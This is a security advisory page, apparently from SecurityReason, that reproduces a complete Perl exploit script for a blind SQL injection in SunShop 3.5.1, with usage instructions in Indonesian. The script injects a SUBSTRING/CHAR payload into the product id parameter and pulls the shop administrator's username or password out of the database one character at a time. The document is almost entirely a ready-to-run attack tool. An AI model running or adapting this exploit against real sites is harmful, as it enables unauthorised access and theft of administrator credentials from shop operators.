SecurityReason - SunShop Version 3.5.1 Remote Blind Sql Injection

Advisory Text :

#!/usr/bin/perl -w

use LWP::UserAgent;

# scripts : SunShop Version 3.5.1 Remote Blind Sql Injection

# scripts site : http://www.turnkeywebtools.com/sunshop/

# Discovered

# By : irvian

# site : http://irvian.cn

# email : irvian.info (at) gmail (dot) com [email concealed]

print "rn[+]-----------------------------------------[+]rn";

print "[+]Blind SQL injection [+]rn";

print "[+]SunShop Version 3.5.1 [+]rn";

print "[+]code by irvian [+]rn";

print "[+]special : ifx, arioo, jipank, bluespy [+]rn";

print "[+]-----------------------------------------[+]nr";

if (@ARGV < 5){

die "

Cara Mengunakan : perl $0 host option id tabel itemid

Keterangan

host : http://victim.com

Option : pilih 1 untuk mencari username dan pilih 2 untuk mencari
password

id : Isi Angka Kolom id biasanya 1, 2 ,3 dst

tabel : Isi Kolom tabel biasanya admin atau ss_admin

itemid : Isi Angka valid (ada productnya) di belakang
index.php?action=item&id=

Contoh : perl $0 http://www.underhills.com/cart 1 1 admin 10

n";}

$url = $ARGV[0];

$option = $ARGV[1];

$id = $ARGV[2];

$tabel = $ARGV[3];

$itemid = $ARGV[4];

if ($option eq 1){

syswrite(STDOUT, "username: ", 10);}

elsif ($option eq 2){

syswrite(STDOUT, "password: ", 10);}

for($i = 1; $i <= 32; $i++){

$f = 0;

$n = 32;

while(!$f && $n <= 57)

{

if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){

$f = 1;

syswrite(STDOUT, chr($n), 1);

}

$n++;

}

if ($f==0){

$n = 97;

while(!$f && $n <= 122)

{

if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){

$f = 1;

syswrite(STDOUT, chr($n), 1);

}

$n++;

}

}

}

print "n[+]finish Execution Exploitn";

sub blind {

my $site = $_[0];

my $op = $_[1];

my $id = $_[2];

my $tbl = $_[3];

my $i = $_[4];

my $n = $_[5];

my $item = $_[6];

if ($op eq 1){

$klm = "username";

}

elsif ($op eq 2){

$klm = "password";

}

my $ua = LWP::UserAgent->new;

my $url =
"$site"."/index.php?action=item&id="."$item"."'%20AND%20SUBSTRING((SELEC

T%20"."$klm"."%20FROM%20"."$tbl"."%20WHERE%20id="."$id"."),"."$i".",1)=C

HAR("."$n".")/*";

my $res = $ua->get($url);

my $browser = $res->content;

if ($browser !~ /This product is currently not viewable/i){

return 1;

}

else {

return 0;

}

}